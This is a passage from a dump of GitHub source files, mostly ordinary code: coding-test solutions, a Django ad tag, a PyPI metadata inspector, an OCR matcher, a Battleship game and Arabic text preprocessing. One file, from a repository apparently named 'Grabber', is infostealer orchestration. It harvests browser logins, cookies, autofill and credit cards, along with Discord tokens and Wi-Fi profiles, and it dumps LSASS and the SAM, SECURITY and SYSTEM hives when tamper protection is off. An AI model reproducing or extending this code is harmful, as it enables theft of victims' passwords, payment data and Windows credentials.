<= N ** 2 + N :\n print(2*N)\n else :\n print(2*N+1)","repo_name":"gistarrr/Coding_Test","sub_path":"BOJ/Basic_Math1/BOJ_1101.py","file_name":"BOJ_1101.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42555323965","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nfrom django import template\nfrom adm.models import Adm, Material\nimport random\n\nregister = template.Library()\n\n@register.simple_tag\ndef show_ad(slug):\n ads = Material.objects.select_related().filter(adm__slug = slug, post = True)\n ads_full = []\n for ad in ads:\n ads_full.extend([ad for i in range(ad.weight)])\n if ads_full:\n\t ad = random.choice(ads_full)\n\t return '''\"%s\"'''%(ad.title, ad.link, slug, ad.title, ad.imagefile.url, ad.title)\n else:\n return 
''","repo_name":"plutokamin/pujia8","sub_path":"adm/templatetags/adm_tags.py","file_name":"adm_tags.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27790139838","text":"def n_m_1(seq):\r\n if len(seq) == m:\r\n print(*seq)\r\n return\r\n \r\n for i in range(n):\r\n if not i+1 in seq:\r\n n_m_1(seq + [i+1])\r\n \r\n\r\n \r\nn, m = map(int, input().split())\r\nn_m_1([])","repo_name":"iamdudumon/CodingTest","sub_path":"백준/Silver/15649. N과 M (1)/N과 M (1).py","file_name":"N과 M (1).py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22522700195","text":"from rp import *\n\n\n#This code is all sloppy; written in a few hours. Didn't debug. But it seems to work well...soo...its good 'nuff for me.\ndef get_name(metadata):\n if file_exists(metadata):\n metadata=text_file_to_string(metadata)\n lines=line_split(metadata)\n lines=[x for x in lines if x.startswith('Name:')]\n return lines\ndef get_site_packages_directory():\n import sysconfig\n out= sysconfig.get_paths()[\"purelib\"]\n if folder_exists(out):\n return out\n # if not folder_exists(out):\n # for _ in sys.path:\n # if get_file_name(_)=='site-packages':\n # return _\n import rp\n return get_parent_directory(get_parent_directory(get_module_path(rp)))#Should look like /home/ryan/.local/lib/python3.8/site-packages/rp/__init__.py then /home/ryan/.local/lib/python3.8/site-packages\n \ndef process(dist_info):\n assert folder_exists(dist_info)\n files=get_all_paths(dist_info,include_files=True,include_folders=False)\n file_names=[get_file_name(file) for file in files]\n assert 'METADATA' in file_names\n assert 'top_level.txt' in file_names\n modules=get_modules(dist_info)\n name=get_pypi_name(dist_info)\n info=get_pypi_info(dist_info)\n return info,modules\ndef get_pypi_name(dist_info_path):\n metadata=path_join(dist_info_path,'METADATA')\n if file_exists(metadata):\n metadata=text_file_to_string(metadata)\n else:\n raise FileNotFoundError(metadata)\n lines=line_split(metadata)\n lines=[x for x in lines if x.startswith('Name:')]\n assert len(lines)==1\n line=lines[0]\n name=line[len('Name:'):].strip()\n return name\ndef get_modules(dist_info_path):\n top_level=path_join(dist_info_path,'top_level.txt')\n top_level=text_file_to_string(top_level)\n top_level=line_split(top_level)\n return top_level\ndef get_dist_info_paths(): \n infos=[x for x in get_subdirectories(get_site_packages_directory()) if x.endswith('.dist-info')]\n return infos\ndef get_dist_infos():\n output=[]\n for path in get_dist_info_paths():\n try:\n processed=process(path)\n # fansi_print(processed[0],'cyan')\n output.append(processed)\n except Exception:\n pass\n out={}\n for o in output:\n for module in o[1]:\n out[module]=o[0]\n return out\n\ndef get_pypi_info(dist_info_path):\n\n output={}\n output['dist-info']=dist_info_path\n\n\n try:\n #EXAMPLE METADATA:\n # Version: 1.7.0\n # Name: torch\n # Home-page: https://pytorch.org/\n # Summary: Tensors and Dynamic neural networks in Python with strong GPU acceleration\n # Keywords: pytorch machine learning\n # Requires-Python: >=3.6.1\n # Author-email: packages@pytorch.org\n # Requires-Dist: future\n # Requires-Dist: numpy\n # Requires-Dist: dataclasses\n metadata=path_join(dist_info_path,'METADATA')\n if file_exists(metadata):\n metadata=text_file_to_string(metadata)\n else:\n raise FileNotFoundError(metadata)\n 
lines=line_split(metadata)\n def get_field(prefix):\n return [x[len(prefix):].strip() for x in lines if x.startswith(prefix)]\n for prefix in 'Name Version Home-page Summary Keywords Requires-Python Author-email Requires-Dist'.split():\n fields=get_field(prefix+':')\n if len(fields)==0:\n continue\n if len(fields)==1:\n output[prefix]=fields[0]\n else:\n output[prefix]=fields\n \n if 'Requires-Dist' in output:\n #Turn stuff like \"prompt-toolkit ; extra == 'ptk'\", into \"prompt-toolkit\"\n if isinstance(output['Requires-Dist'],list):\n output['Requires-Dist']=sorted(set([x.split()[0] for x in output['Requires-Dist']]))\n elif isinstance(output['Requires-Dist'],str):\n output['Requires-Dist']=[output['Requires-Dist'].split()[0]]#i changed my mind keep it as a list\n\n for from_name,to_name in [('Requires-Dist','Dependencies'),('Home-page','Homepage'),('Author-email',\"Author Email\"),('Requires-Python','Requires Python')]:\n if from_name in output:\n output[to_name]=output[from_name]\n del output[from_name]\n \n except Exception as e:\n #if 'cv' in output['Package Name']:\n print_verbose_stack_trace(e)\n \n\n try:\n entry_points=path_join(dist_info_path,'entry_points.txt')\n #entry_points=text_file_to_string(entry_points)\n #entry_points=entry_points.splitlines()\n #entry_points=[x.strip() for x in entry_points]\n #entry_points=[x for x in entry_points if x]\n scripts=get_console_scripts(entry_points)\n #if len(scripts)==1:\n #scripts=scripts[0]\n #output['Console Script']=scripts\n if scripts:\n output['Console Scripts']=scripts\n except Exception:pass\n\n try:\n output['Modules']=get_modules(dist_info_path)\n except Exception:pass\n return output\ndef get_console_scripts(entry_points):\n if path_exists(entry_points):\n entry_points=text_file_to_string(entry_points)\n entry_points=line_split(entry_points)\n output=[]\n flag=False\n for line in entry_points:\n line=line.strip()\n if line=='[console_scripts]':\n flag=True\n continue\n elif line.startswith('[') and line.endswith(']'):\n break\n if flag:\n if line:\n output.append(line)\n output=[x.split('=')[0].strip() for x in output]#Turn ['yapf = yapf:run_main'] into ['yapf']\n output=set(output)\n output=sorted(output)\n \n #ic(output)\n return output\n\ndef get_pypi_info_from_module(module):\n assert is_a_module(module)\n name=module.__name__\n name=name.split('.')[0]#rp.prompt_toolkit --> rp\n info=get_dist_infos()\n if name in info:\n return info[name]\n return None\n\ndef display_module_pypi_info(object,info=None):\n #assert is_a_module(module)\n #module_name=module.__name__\n module_name=get_module_name_from_object(object)\n fansi_print('PyPI package info for module '+module_name+':','blue','bold')\n info=info or get_pypi_info_from_module_name(module_name)\n indent=' '\n if info is None:\n fansi_print('Failed to find any package information for '+module_name+'. 
Maybe it didnt come from PyPI?','red','bold')\n else:\n for field in sorted(info):\n fansi_print(indent+field+': ','green','bold',new_line=False)\n data=info[field]\n if isinstance(data,list) and len(data)==1:\n data=data[0]\n if isinstance(data,list) and not data:\n continue\n if isinstance(data,str):\n print(data)\n else:\n print()\n print(indentify(line_join(data),indent=2*indent))\n\ndef display_all_pypi_info():\n iinfo=get_dist_infos()\n for name in sorted(iinfo):\n info=get_pypi_info_from_module_name(name,iinfo)\n display_module_pypi_info(name,info)\n print()\n\n \ndef get_module_from_object(o):\n if isinstance(o,str):\n pass\n\ndef get_module_name_from_object(o):\n if isinstance(o,str):\n return o\n if is_a_module(o):\n return o.__name__\n import inspect\n module=inspect.getmodule(o)\n if module is None:\n module=inspect.getmodule(type(o))\n # if is_a_module(module):\n # return module.__name__\n try:\n return module.__name__\n except Exception:\n pass\n raise TypeError('Failed to get the module name for the given object')\n\ndef get_pypi_info_from_module_name(module_name,info=None):\n #assert is_a_module(module)\n name=module_name\n name=name.split('.')[0]#rp.prompt_toolkit --> rp\n info=info or get_dist_infos()\n if name in info:\n return info[name]\n return None\n\ndef get_pypi_module_package_names():\n import rp.pypi_inspection as p\n o=p.get_dist_infos()\n q={}\n for x in o:\n q[x]=o[x]['Name']\n q.update(r.known_pypi_module_package_names)\n q={x:y for x,y in q.items() if x}\n q={x:y for x,y in q.items() if x!=y}\n t={}\n for x in sorted(q):\n t[x]=q[x]\n return t\n","repo_name":"RyannDaGreat/rp","sub_path":"pypi_inspection.py","file_name":"pypi_inspection.py","file_ext":"py","file_size_in_byte":8345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"40753298443","text":"from typing import Dict, List\nfrom ...template.tp_node_item import TpNodeItem\nfrom ...utils import str_util\nfrom ocr_structuring.utils.logging import logger\nfrom ...utils.node_item_group import NodeItemGroup\nfrom .tp_conf_base_item import TpConfBaseItem\n\nBG_MATCH_MODE_COMMON = \"common\"\nBG_MATCH_MODE_HORIZONTAL_SPLIT = \"h_split\"\nBG_MATCH_MODE_HORIZONTAL_MERGE = \"h_merge\"\nBG_MATCH_MODE_VERTICAL_MERGE = \"v_merge\"\n\n\nclass TpConfBgItem(TpConfBaseItem):\n def __init__(self, item_conf, is_tp_conf: bool = False):\n super().__init__(item_conf, is_tp_conf)\n self.content = self.contents[0]\n self.mode = item_conf.get(\"mode\", BG_MATCH_MODE_COMMON)\n self.match_func = {\n BG_MATCH_MODE_COMMON: self._norm_match,\n BG_MATCH_MODE_HORIZONTAL_MERGE: self._horizontal_merge_match,\n BG_MATCH_MODE_HORIZONTAL_SPLIT: self._horizontal_split_match,\n }\n assert self.mode in self.match_func.keys(), \"current mode is {}\".format(\n self.mode\n )\n\n def _norm_match(self, node_items: Dict[str, TpNodeItem]) -> List[TpNodeItem]:\n out = []\n for node_item in node_items.values():\n if self.check_content_similar(\n node_item.text, remove_space=True, remove_symbols=True\n ):\n out.append(node_item)\n\n return out\n\n def _horizontal_split_match(\n self, node_items: Dict[str, TpNodeItem]\n ) -> List[TpNodeItem]:\n norm_match_res = self._norm_match(node_items)\n if len(norm_match_res) != 0:\n return norm_match_res\n\n # 如果是有编辑距离的设置,则只使用 text 的内容进行 split\n if type(self.content) != str:\n bg_content = self.content[\"text\"]\n else:\n bg_content = self.content\n\n out = []\n for it in node_items.values():\n sub_str_start_idxes = str_util.findall_sub_str_idx(\n 
sub_text=bg_content, text=it.text\n )\n\n if len(sub_str_start_idxes) != 1:\n continue\n\n start_idx = sub_str_start_idxes[0]\n end_idx = sub_str_start_idxes[0] + len(bg_content)\n\n if end_idx > start_idx:\n new_node = it.split(start_idx, end_idx)\n if new_node:\n out.append(TpNodeItem(new_node.gen_ltrb_raw_node()))\n\n return out\n\n def _horizontal_merge_match(\n self, node_items: Dict[str, TpNodeItem]\n ) -> List[TpNodeItem]:\n norm_match_res = self._norm_match(node_items)\n if len(norm_match_res) != 0:\n return norm_match_res\n\n # 如果是有编辑距离的设置,则只使用 text 的内容进行 merge\n if not isinstance(self.content, str):\n bg_content = self.content[\"text\"]\n else:\n bg_content = self.content\n\n candidate_node_items = {}\n candidate_chars_count = 0\n\n for node_item in node_items.values():\n if node_item.cn_text in bg_content:\n candidate_node_items[node_item.uid] = node_item\n candidate_chars_count += len(node_item.cn_text)\n\n # 候选的节点的总长度小于背景的 content 长度,直接返回\n if candidate_chars_count < len(bg_content):\n return []\n\n line_groups = NodeItemGroup.find_row_lines(candidate_node_items)\n\n grouped_segs: List[List[NodeItemGroup]] = []\n for group in line_groups:\n segs = group.find_x_segs()\n grouped_segs.append(segs)\n\n out = []\n for segs in grouped_segs:\n for seg in segs:\n if seg.content() == bg_content:\n new_node = TpNodeItem(seg.gen_raw_node())\n out.append(new_node)\n logger.debug(f\"Merge mode bg item match success: {new_node}\")\n\n return out\n\n def match_node(self, node_items: Dict[str, TpNodeItem]) -> List[TpNodeItem]:\n matched_node_items = self.match_func[self.mode](node_items)\n return matched_node_items\n\n def __str__(self):\n return f\"{self.content} {self.bbox}\"\n","repo_name":"imfifc/myocr","sub_path":"ocr_structuring/core/template/matcher/tp_conf_bg_item.py","file_name":"tp_conf_bg_item.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42884515499","text":"from service.Paths import Paths\nfrom modules.Browser import getAutoFill, getCookies, getLoginData, getHistory, getCreditCards, getDownloads\nfrom modules.Discord import getToken\nfrom modules.FileManager import find_everyfile_extension\nfrom modules.Network import getInterfaces, getNetworkProfiles, getMoreInternet\nfrom modules.Windows import dumpLsass, isTamperProtected, dumpSamDatabase, dumpSecurityDatabase, dumpSystemDatabase, getComputerInformation\nfrom service.functions import find_computerName\n\n\ndef find_browsers_data():\n browsers = Paths.get(\"browser\")\n data = {}\n\n for browser in browsers:\n data[browser] = {}\n data[browser][\"Autofill\"] = getAutoFill(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"LoginData\"] = getLoginData(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"Cookies\"] = getCookies(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"History\"] = getHistory(\n browser, Paths.get(\"browser\").get(browser))\n # data[browser][\"Bookmarks\"] = getBookmarks(\n # browser, Paths.get(\"browser\").get(browser))\n data[browser][\"Downloads\"] = getDownloads(\n browser, Paths.get(\"browser\").get(browser))\n data[browser][\"Credit_Cards\"] = getCreditCards(\n browser, Paths.get(\"browser\").get(browser)\n )\n\n return data\n\n\ndef find_network_data():\n data = {}\n data[\"Interfaces\"] = getInterfaces()\n data[\"Profiles\"] = getNetworkProfiles()\n data[\"More\"] = getMoreInternet(10)\n return data\n\n\ndef find_discord_data():\n discords = 
Paths.get(\"discord\")\n data = {}\n\n for discord in discords:\n data[discord] = {}\n data[discord][\"token\"] = getToken(\n discord,\n Paths.get(\"discord\").get(discord))\n print(data)\n return data\n\n\ndef find_windows_data():\n windows_data = getComputerInformation()\n print(windows_data)\n return windows_data\n\n\ndef handle_windows():\n if isTamperProtected():\n return \"Tamper protection is enabled, please disable it and try again.\"\n else:\n # disableRealtimeDefender()\n # enableDebugPrivilege()\n dumpLsass(find_computerName() + \"lsass.dmp\")\n dumpSamDatabase(find_computerName() + \"sam\")\n dumpSecurityDatabase(find_computerName() + \"security\")\n dumpSystemDatabase(find_computerName() + \"system\")\n return \"OK\"\n","repo_name":"lukasolsen/CodeVault","sub_path":"Grabber/client/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32327774594","text":"import os\r\nimport time\r\n\r\n\r\nclass Player:\r\n def __init__(self):\r\n self.name = ''\r\n self.n, self.m = 10, 10\r\n self.hits = [[0 for _ in range(self.m)] for _ in range(self.n)]\r\n self.ships = [[0 for _ in range(self.m)] for _ in range(self.n)]\r\n self.storage = []\r\n\r\n def print_field(self, paint=True): # рисует поле. Если идет игра, то корабли не отображаются\r\n os.system('cls')\r\n print(' ', 0, 1, 2, 3, 4, 5, 6, 7, 8, 9)\r\n for i in range(self.m):\r\n print(i, end=' ')\r\n for j in range(self.n):\r\n if self.ships[i][j] == 0: # Пусто\r\n print('.', end=' ')\r\n elif self.ships[i][j] == 1: # Корабль\r\n print('@', end=' ') if paint else print('.', end=' ')\r\n elif self.ships[i][j] == 2: # Мимо\r\n print('*', end=' ')\r\n elif self.ships[i][j] == 3: # Ранен\r\n print('x', end=' ')\r\n elif self.ships[i][j] == 4: # Убит\r\n print('@', end=' ')\r\n print()\r\n\r\n def check_ship(self, deck, s, c, orient=1): # Проверка, можно ли поместить корабль в данном месте\r\n if (orient == 2 and (s + deck - 1) >= self.n) or (orient == 1 and (c + deck -1) >= self.n):\r\n print('Не лезет!!!')\r\n return False\r\n if orient == 1:\r\n for i in range(s-1, s+2):\r\n for j in range(c-1, c + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and self.ships[i][j]:\r\n print('Касается другого корабля!')\r\n return False\r\n return True\r\n if orient == 2:\r\n for i in range(c-1, c+2):\r\n for j in range(s-1, s + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and self.ships[j][i]:\r\n print('Касается другого корабля!')\r\n return False\r\n return True\r\n\r\n def place_ship(self, deck, s, c, orient=1): # сохраняет корабль\r\n spisok = []\r\n if orient == 1:\r\n for _ in range(deck):\r\n self.ships[s][c] = 1\r\n spisok.append([s, c])\r\n c += 1\r\n if orient == 2:\r\n for _ in range(deck):\r\n self.ships[s][c] = 1\r\n spisok.append([s, c])\r\n s += 1\r\n self.storage.append(spisok)\r\n\r\n def input_coord(self): # ввод координат кораблей\r\n for i in [4, 3, 3, 2, 2, 2, 1, 1, 1, 1]:\r\n check = False\r\n orient = 1\r\n while not check:\r\n orient = 1\r\n if i == 1:\r\n print('Введите координату {}-палубного корабля'.format(i))\r\n else:\r\n print('Введите координату {}-палубного корабля,'.format(i),\r\n 'введите направление: 1 - горизонтально, 2 - вертикально')\r\n try:\r\n new_str = input().split()\r\n s = int(new_str[0])\r\n c = int(new_str[1])\r\n if len(new_str) > 2:\r\n orient = int(new_str[3])\r\n if orient not in [1, 2]:\r\n raise ValueError\r\n check = self.check_ship(i, s, c, orient)\r\n except 
ValueError:\r\n print('Введите корректное значение!')\r\n time.sleep(0.5)\r\n except IndexError:\r\n print('Введите корректное значение!')\r\n time.sleep(0.5)\r\n self.place_ship(i, s, c, orient)\r\n self.print_field()\r\n\r\n def check_win(self): # проверка выигрыша\r\n dead = 0\r\n for i in range(self.m):\r\n for j in range(self.n):\r\n if self.ships[i][j] == 4:\r\n dead += 1\r\n return True if dead == 20 else False\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n self.player1 = Player()\r\n self.player2 = Player()\r\n self.player1.name = input('Введите имя первого игрока: ')\r\n self.player1.print_field()\r\n self.player1.input_coord()\r\n self.player2.print_field()\r\n self.player2.name = input('Введите имя второго игрока: ')\r\n self.player2.input_coord()\r\n print(self.player1.storage)\r\n os.system('cls')\r\n self.shot()\r\n\r\n def shot(self): # Принимает координаты выстрела\r\n flag = True\r\n player = self.player1 if flag else self.player2\r\n while not player.check_win():\r\n try:\r\n player.print_field(False)\r\n print('Ход игрока', player.name)\r\n s, c = list(map(int, input().split()))\r\n while player.hits[s][c]:\r\n print('Вы уже сюда стреляли! Попробуйте снова!')\r\n s, c = list(map(int, input().split()))\r\n player.hits[s][c] = 1\r\n flag = self.check_shot(player, s, c, flag)\r\n player = self.player1 if flag else self.player2\r\n except ValueError:\r\n print('Введите корректное значение!')\r\n time.sleep(0.5)\r\n print('Вы выиграли!')\r\n\r\n def check_shot(self, player, s, c, flag): # Проверяет, чему соответствует выстрел: мимо, убит, ранен\r\n if player.ships[s][c] == 0:\r\n player.ships[s][c] = 2\r\n player.print_field(False)\r\n print('мимо')\r\n time.sleep(0.8)\r\n return not flag\r\n elif player.ships[s][c] == 1:\r\n player.ships[s][c] = 3\r\n if self.check_dead(player, s, c):\r\n print('Убит')\r\n else:\r\n player.print_field(False)\r\n print('ранен')\r\n time.sleep(0.5)\r\n return flag\r\n\r\n @staticmethod\r\n def check_dead(player, s, c): # Проверяет, убит ли корабль\r\n for i in range(10):\r\n if [s, c] in player.storage[i]:\r\n for j in player.storage[i]:\r\n k, m = j\r\n if player.ships[k][m] != 3:\r\n return False\r\n for j in player.storage[i]:\r\n k, m = j\r\n player.ships[k][m] = 4\r\n Game.mimo(player, i)\r\n return True\r\n\r\n @staticmethod\r\n def mimo(player, m): # Расставляет мимо вокруг потонувшего корабля\r\n s, c = player.storage[m][0]\r\n deck = len(player.storage[m])\r\n if deck > 1 and player.storage[m][0][1] == player.storage[m][1][1]:\r\n orient = 2\r\n else:\r\n orient = 1\r\n if orient == 1:\r\n for i in range(s-1, s+2):\r\n for j in range(c-1, c + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and not player.ships[i][j]:\r\n player.ships[i][j] = 2\r\n player.hits[i][j] = 1\r\n if orient == 2:\r\n for i in range(c-1, c+2):\r\n for j in range(s-1, s + deck + 1):\r\n if 0 <= i <= 9 and 0 <= j <= 9 and not player.ships[j][i]:\r\n player.ships[j][i] = 2\r\n player.hits[j][i] = 1\r\n\r\n\r\nos.system('cls')\r\ngame = Game()\r\n\r\n\r\n","repo_name":"GuldarKh/Python_HomeWorks","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":7945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70111065928","text":"\"\"\" :mod: LogUpload\n ====================\n\n .. 
module: LogUpload\n :synopsis: logUpload operation handler\n\n LogUpload operation handler\n\"\"\"\n\n# # imports\nimport os\nfrom DIRAC import S_OK, S_ERROR\nfrom DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor\nfrom DIRAC.DataManagementSystem.Agent.RequestOperations.DMSRequestOperationsBase import DMSRequestOperationsBase\n\nclass LogUpload( DMSRequestOperationsBase ):\n \"\"\"\n .. class:: LogUpload\n\n LogUpload operation handler\n \"\"\"\n\n def __init__( self, operation = None, csPath = None ):\n \"\"\"c'tor\n\n :param self: self reference\n :param Operation operation: Operation instance\n :param str csPath: CS path for this handler\n \"\"\"\n # # base class ctor\n super( LogUpload, self ).__init__( operation = operation, csPath = csPath )\n # # gMonitor stuff\n gMonitor.registerActivity( \"LogUploadAtt\", \"Log upload attempted\",\n \"RequestExecutingAgent\", \"Files/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"LogUploadOK\", \"Replications successful\",\n \"RequestExecutingAgent\", \"Files/min\", gMonitor.OP_SUM )\n gMonitor.registerActivity( \"LogUploadFail\", \"Replications failed\",\n \"RequestExecutingAgent\", \"Files/min\", gMonitor.OP_SUM )\n self.workDirectory = os.environ.get( 'LOGUPLOAD_CACHE', os.environ.get( 'AGENT_WORKDIRECTORY', '/tmp/LogUpload' ) )\n\n def __call__( self ):\n \"\"\" LogUpload operation processing \"\"\"\n # # list of targetSEs\n\n if len( self.operation.targetSEList ) != 1:\n self.log.error( \"wrong value for TargetSE list = %s, should contain only one target!\" % self.operation.targetSEList )\n self.operation.Error = \"Wrong parameters: TargetSE should contain only one targetSE\"\n for opFile in self.operation:\n\n opFile.Status = \"Failed\"\n opFile.Error = \"Wrong parameters: TargetSE should contain only one targetSE\"\n\n gMonitor.addMark( \"LogUploadAtt\", 1 )\n gMonitor.addMark( \"LogUploadFail\", 1 )\n\n return S_ERROR( \"TargetSE should contain only one target, got %s\" % self.operation.targetSEList )\n\n # # check targetSEs for write\n bannedTargets = self.checkSEsRSS()\n if not bannedTargets['OK']:\n gMonitor.addMark( \"LogUploadAtt\", 1 )\n gMonitor.addMark( \"LogUploadFail\", 1 )\n return bannedTargets\n\n # # get waiting files\n waitingFiles = self.getWaitingFilesList()\n\n # # loop over files\n for opFile in waitingFiles:\n # # get LFN\n lfn = opFile.LFN\n self.log.info( \"processing file %s\" % lfn )\n gMonitor.addMark( \"LogUploadAtt\", 1 )\n\n destination = '/'.join( lfn.split( '/' )[0:-1] ) + '/' + ( os.path.basename( lfn ) ).split( '_' )[1].split( '.' 
)[0]\n logUpload = self.dm.replicate( lfn, self.operation.targetSEList[0], destPath = destination, localCache = self.workDirectory )\n if not logUpload[\"OK\"]:\n gMonitor.addMark( \"LogUploadFail\", 1 )\n# self.dataLoggingClient().addFileRecord( lfn, \"LogUploadFail\", targetSE, \"\", \"LogUpload\" )\n self.log.error( \"completely failed to upload log file: %s\" % logUpload[\"Message\"] )\n opFile.Error = str( logUpload[\"Message\"] )\n opFile.Attempt += 1\n self.operation.Error = opFile.Error\n if 'No such file or directory' in opFile.Error:\n opFile.Status = 'Failed'\n continue\n\n if lfn in logUpload['Value']:\n gMonitor.addMark( \"LogUploadOK\", 1 )\n# self.dataLoggingClient().addFileRecord( lfn, \"LogUpload\", targetSE, \"\", \"LogUpload\" )\n opFile.Status = 'Done'\n self.log.info( \"Uploaded %s to %s\" % ( lfn, self.operation.targetSEList[0] ) )\n\n return S_OK()\n","repo_name":"antolu/LHCbDIRAC","sub_path":"LHCbDIRAC/DataManagementSystem/Agent/RequestOperations/LogUpload.py","file_name":"LogUpload.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4316484390","text":"# Find the sum of the Digits of a Number.\n# Given an input the objective to find the Sum of Digits of a Number.\n# To do so we’ll first extract the last element of the number and then keep shortening the number itself.\n\n# Example\n# Input : number = 123\n# Output : 6\n\ndef sum_of_digits(num):\n s=0\n while(num!=0):\n s+=num%10\n num=num//10\n return s\n\nnum=int(input())\nprint(sum_of_digits(num))\n","repo_name":"ananya123-gif/Python_code-","sub_path":"PrepInsta_100_Code/Getting Started/10) Find the sum of the Digits of a Number.py","file_name":"10) Find the sum of the Digits of a Number.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2850972390","text":"import numpy as np\nimport pandas as pd\nfrom nltk import ISRIStemmer\nfrom pyarabic import araby\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nfrom stop_words import ArabicStopWords\nimport re\n\ndef tokenize(sample):\n tokens = araby.tokenize(sample)\n return tokens\n\n# Taking a List\ndef remove_Stop_Words(tokens):\n stop_words = ArabicStopWords()\n filtered = [token for token in tokens if token not in stop_words.get_stop_words()]\n return filtered\n\n\ndef print_Stop_Words(tokens):\n stop_words = ArabicStopWords()\n filtered = [token for token in tokens if token in stop_words.get_stop_words()]\n return filtered\n\n# Taking a List\ndef stemming(filtered_tokens):\n stemmer = ISRIStemmer()\n stemmed_tokens = [stemmer.stem(token) for token in filtered_tokens]\n return stemmed_tokens\n\n# Taking a word\ndef normalize(token):\n token = re.sub(\"[إأآا]\", \"ا\", token)\n token = re.sub(\"ى\", \"ي\", token)\n token = re.sub(\"ة\", \"ه\", token)\n token = re.sub(\"[\\W\\d]\", \"\", token)\n token = araby.strip_diacritics(token)\n token = araby.strip_tatweel(token)\n return token\n\nimport pandas as pd\n\n# Reading Dataset\nfile_path = 'DataSet.txt'\ncols = ['Class', 'Text']\nsample = pd.DataFrame(columns=cols)\n\nwith open(file_path, 'r', encoding='utf-8') as f:\n for line in f:\n try:\n line_parts = line.strip().split('\\t')\n class_label = line_parts[0]\n text = line_parts[1]\n new_row = pd.DataFrame({'Class': class_label, 'Text': text}, index=[0])\n sample = pd.concat([sample, new_row], ignore_index=True)\n except:\n pass\n\n\n# Preprocessing / 
Cleaning Dataset\n\n# Tokenization\nfor row in range(len(sample)):\n sample['Text'][row] = tokenize(sample['Text'][row])\n\n# Normalization\nfor row in range(len(sample)):\n sample['Text'][row] = [normalize(token) for token in sample['Text'][row]]\n\n# Removing Stop Words\nfor row in range(len(sample)):\n sample['Text'][row] = remove_Stop_Words(sample['Text'][row])\n\n# Stemming\nfor row in range(len(sample)):\n print(\"The ain't believe in us 2\")\n sample['Text'][row] = stemming(sample['Text'][row])\n\n# Removing null values\nfor row in range(len(sample)):\n sample['Text'][row] = [text for text in sample['Text'][row] if text != '']\n if not sample['Text'][row]: # check if the list is empty\n sample.drop(row, inplace=True)\n\n\nsample.to_csv('DataSet.csv', index=False)\n\n\n","repo_name":"SssiiiSssiii/Graduation-Project","sub_path":"Modules/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28759572797","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n#在test_case02基础上修改,修改返回错误信息\n\n\"\"\"\n需求:自动读取、执行excel里面的接口测试用例,测试完成后,返回错误结果并发送邮件通知。\n一步一步捋清需求:\n1、设计excel表格\n2、读取excel表格\n3、拼接url,发送请求\n4、汇总错误结果、发送邮件\n\"\"\"\nimport pytest\nimport xlrd\nimport os\nimport requests\nimport json\nimport yaml\nimport smtplib\nimport time\nimport datetime\nimport sys\nimport cx_Oracle\nimport webbrowser\nimport pytestreport\nimport logging\n\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.header import Header\nfrom threading import Timer\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nfrom common import Encrypt\nfrom common import Email\nfrom common import Log\n\ndef cases_in_excel(test_case_file):\n #workbook = xlrd.open_workbook(r'G:\\8.python\\ApiTest\\data\\test_data02.xlsx') # 直接读取execl文件\n change_dir = os.chdir(\"G:/8.python/pytest_testApi/Params\") #切换工作目录\n test_case_file = os.path.join(os.getcwd(), test_case_file) #获取修改后的工作目录\n print(test_case_file)\n if not os.path.exists(test_case_file):\n\n print(\"测试用例excel文件不存在或路径有误!\")\n # 找不到指定测试文件,就退出程序 os.system(\"exit\")是用来退出cmd的\n sys.exit()\n\n else:\n # 读取excel文件\n test_case = xlrd.open_workbook(test_case_file)\n # 获取第一个sheet,下标从0开始\n table = test_case.sheet_by_index(1)\n # 记录错误用例\n error_cases = []\n # 一张表格读取下来,其实就像个二维数组,无非是读取第一行的第几列的值,由于下标是从0开始,第一行是标题,所以从第二行开始读取数据\n for i in range(1, table.nrows):\n num = str(int(table.cell(i, 0).value)).replace(\"\\n\", \"\").replace(\"\\r\", \"\") #获取第2行第1列的内容\n api_name = table.cell(i, 1).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n api_host = table.cell(i, 2).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n request_url = table.cell(i, 3).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n method = table.cell(i, 4).value.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n request_data_type = table.cell(i, 5).value.replace(\"\\n\", 